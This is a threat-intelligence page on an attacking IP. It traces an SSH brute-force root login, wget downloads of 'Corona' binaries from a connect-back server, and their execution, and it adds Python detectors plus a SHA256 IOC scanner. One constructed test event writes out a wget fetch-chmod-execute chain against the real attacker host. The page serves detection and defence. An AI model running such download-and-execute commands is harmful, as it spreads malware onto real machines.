IP Address: 51.159.7.65 (Malicious)


This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker

Services Targeted

SSH

Tags

Successful SSH Login, HTTP, SSH Brute Force, Outgoing Connection, Download File, Download Operation, SSH, Listening, Download and Allow Execution, Download and Execute

Connect Back Servers

91.209.70.174

Basic Information

IP Address

51.159.7.65

Domain

-

ISP

-

Country

United Kingdom of Great Britain and Northern Ireland

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-10-29

Last seen in Guardicore Centra

2019-10-29

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

A user logged in using SSH with the following credentials: root / ******* - Authentication policy: White List (Part of a Brute Force Attempt)

Successful SSH Login SSH Brute Force

A possibly malicious Download Operation was detected

Download Operation

Process /usr/bin/wget generated outgoing network traffic to 91.209.70.174:80 (6 times)

Outgoing Connection

The file /tmp/Corona.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.mips was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.mipsel was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.sh4 was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/Corona.x86_64 was downloaded and granted execution privileges

Download and Allow Execution

Process /tmp/gewa started listening on port 4939 (2 times)

Listening

The file /tmp/gewa was downloaded and executed (2 times)

Download and Execute

The file /tmp/Corona.arm6 was downloaded and granted execution privileges

Download and Allow Execution

Connection was closed due to timeout
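The attack flow above is a staged chain: repeated SSH failures, then an accepted root login, then wget fetching from the connect-back server, then files in /tmp being made executable and run, then a listener. The following is an added example (not Guardicore's or Centra's code) of how the same chain can be tagged from host telemetry. The sshd lines and the process-event records are constructed to model the flow on this page, the event format is an assumed EDR/auditd-style export, and the brute-force threshold is an assumption; only the attacker IP, the connect-back IP, the paths and the tag names come from the page.

```python
import re
from collections import Counter

# Indicators taken from the page; everything else in this block is an assumption.
ATTACKER_IP = "51.159.7.65"
CONNECT_BACK = "91.209.70.174"
BRUTE_FORCE_THRESHOLD = 5   # assumed: failures from one source before a later success is tagged

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port \d+")

# Constructed sshd log lines (not from the page): six failed root logins, then a success.
SSHD_LINES = [
    f"Oct 29 10:01:0{i} host sshd[12{i}]: Failed password for root from {ATTACKER_IP} port 4012{i} ssh2"
    for i in range(1, 7)
] + [f"Oct 29 10:01:09 host sshd[1299]: Accepted password for root from {ATTACKER_IP} port 40130 ssh2"]

# Constructed process events in an assumed EDR/auditd-style export, modelling the chain above.
PROC_EVENTS = [
    {"exe": "/usr/bin/wget", "argv": ["wget", f"http://{CONNECT_BACK}/Corona.sh", "-O", "/tmp/Corona.sh"],
     "dst": f"{CONNECT_BACK}:80"},
    {"exe": "/bin/chmod", "argv": ["chmod", "+x", "/tmp/Corona.sh"]},
    {"exe": "/bin/sh", "argv": ["sh", "/tmp/Corona.sh"]},
    {"exe": "/tmp/gewa", "argv": ["/tmp/gewa"], "listen": 4939},
]


def detect_ssh(lines, threshold=BRUTE_FORCE_THRESHOLD):
    """Tag each accepted login; add 'SSH Brute Force' when the same source
    address had at least `threshold` failures earlier in the stream."""
    failures = Counter()
    findings = []
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, src = m.groups()
            tags = ["Successful SSH Login"]
            if failures[src] >= threshold:
                tags.append("SSH Brute Force")
            findings.append({"user": user, "src": src, "failures": failures[src], "tags": tags})
    return findings


def detect_process(events):
    """Walk process events in order and emit (tag, detail) pairs for the
    download -> chmod +x -> execute -> listen chain."""
    downloaded, executable, findings = set(), set(), []
    for ev in events:
        exe, argv = ev["exe"], ev["argv"]
        if exe.endswith(("wget", "curl")):
            if "dst" in ev:
                findings.append(("Outgoing Connection", ev["dst"]))
            for i, arg in enumerate(argv):            # simplification: only -O/-o output paths
                if arg in ("-O", "-o") and i + 1 < len(argv):
                    downloaded.add(argv[i + 1])
                    findings.append(("Download Operation", argv[i + 1]))
        elif exe.endswith("chmod") and "+x" in argv:  # simplification: literal +x only
            for path in argv[1:]:
                if path in downloaded:
                    executable.add(path)
                    findings.append(("Download and Allow Execution", path))
        else:
            ran = [a for a in (exe, *argv) if a in executable]
            if ran:
                findings.append(("Download and Execute", ran[0]))
        if "listen" in ev and exe.startswith("/tmp/"):   # a listener started from /tmp
            findings.append(("Listening", f"{exe}:{ev['listen']}"))
    return findings


def analyze(lines=SSHD_LINES, events=PROC_EVENTS):
    """Combine both detectors into the sorted tag set an incident would carry."""
    tags = set()
    for finding in detect_ssh(lines):
        tags.update(finding["tags"])
    tags.update(tag for tag, _ in detect_process(events))
    return sorted(tags)


if __name__ == "__main__":
    for finding in detect_ssh(SSHD_LINES):
        print(finding)
    for hit in detect_process(PROC_EVENTS):
        print(hit)
    print(analyze())
```

The brute-force tag is attached to the accepted login rather than to the failures, which is what makes it actionable: a burst of failures alone is background noise on any internet-facing SSH port, a success after such a burst is the incident.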

Associated Files

/tmp/Corona.mips

SHA256: 7b126aa7eeccd81b7e69d58ec6b43333321d5be97ed208338630a51d469cf150

83,543 bytes

/tmp/Corona.sh

SHA256: fae1c9a6cafcdf299f86a78ffed4e371b82b05b3f09eb933d866ab3244d0c704

1,814 bytes

/tmp/Corona.x86_64

SHA256: e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360

65,447 bytes

/tmp/gewa

SHA256: e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360

65,447 bytes (identical SHA256 and size to /tmp/Corona.x86_64 above: the same x86_64 payload under a second name)

/tmp/Corona.arm6

SHA256: f5e5f84bf42ae26e73e8ff2dece52c9f7b9ab4b8b9301463ca0bcb6a5ba3c488

92,958 bytes

/tmp/Corona.sh4

SHA256: 2e7511928c2954b7d4b6e2646a95eec9bac0fabfb367037e59d082e403f30987

60,034 bytes
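The file list above is usable directly as a host-side IOC set. The following is an added example (not Guardicore's code) that loads the page's SHA256 digests and sizes, points out digests that appear under more than one name (the page lists one digest for both /tmp/Corona.x86_64 and /tmp/gewa), and scans a directory for files whose digest matches, using the listed sizes as a pre-filter so that only candidate files are hashed. The scan logic, the size pre-filter and the constructed sample file written to a temporary directory are assumptions; the digests and sizes are the page's.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# SHA256 digests and sizes exactly as listed on the page, keyed by the dropped path.
IOCS = {
    "/tmp/Corona.mips":   ("7b126aa7eeccd81b7e69d58ec6b43333321d5be97ed208338630a51d469cf150", 83543),
    "/tmp/Corona.sh":     ("fae1c9a6cafcdf299f86a78ffed4e371b82b05b3f09eb933d866ab3244d0c704", 1814),
    "/tmp/Corona.x86_64": ("e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360", 65447),
    "/tmp/gewa":          ("e3e329150fd238bd751611d780d44883969cc7ed70a03fad81d1a727e20c4360", 65447),
    "/tmp/Corona.arm6":   ("f5e5f84bf42ae26e73e8ff2dece52c9f7b9ab4b8b9301463ca0bcb6a5ba3c488", 92958),
    "/tmp/Corona.sh4":    ("2e7511928c2954b7d4b6e2646a95eec9bac0fabfb367037e59d082e403f30987", 60034),
}


def sha256_file(path, chunk=1 << 16):
    """Stream a file through SHA256 without loading it whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def duplicate_hashes(iocs):
    """Group listed paths by digest; a digest with several paths is one payload under several names."""
    by_hash = defaultdict(list)
    for path, (digest, _size) in iocs.items():
        by_hash[digest].append(path)
    return {d: sorted(p) for d, p in by_hash.items() if len(p) > 1}


def scan_dir(root, iocs):
    """Hash regular files under root whose size matches a listed IOC and report digest matches."""
    wanted = defaultdict(list)
    sizes = set()
    for path, (digest, size) in iocs.items():
        wanted[digest].append(path)
        sizes.add(size)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            if os.path.getsize(full) not in sizes:   # cheap pre-filter before hashing
                continue
            digest = sha256_file(full)
            if digest in wanted:
                hits.append({"file": full, "sha256": digest, "known_as": sorted(wanted[digest])})
    return hits


def demo():
    """Constructed demo (assumption): a fake payload whose digest is added to the IOC set,
    dropped under the name 'gewa' in a temporary directory next to a benign file."""
    fake = b"constructed sample, not real malware\n"
    iocs = dict(IOCS)
    iocs["/tmp/constructed.bin"] = (hashlib.sha256(fake).hexdigest(), len(fake))
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "gewa"), "wb") as f:
            f.write(fake)
        with open(os.path.join(d, "notes.txt"), "wb") as f:
            f.write(b"benign\n")
        return scan_dir(d, iocs)


if __name__ == "__main__":
    print(duplicate_hashes(IOCS))
    print(demo())
```

Matching on digest rather than on path or name is deliberate: the flow above shows the same bytes landing as /tmp/Corona.x86_64 and as /tmp/gewa, so a name-based rule would miss one of the two copies, and a recompiled or repacked build would not match at all, which is why a hash IOC list is a complement to the behavioural detection of the chain, not a replacement for it.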
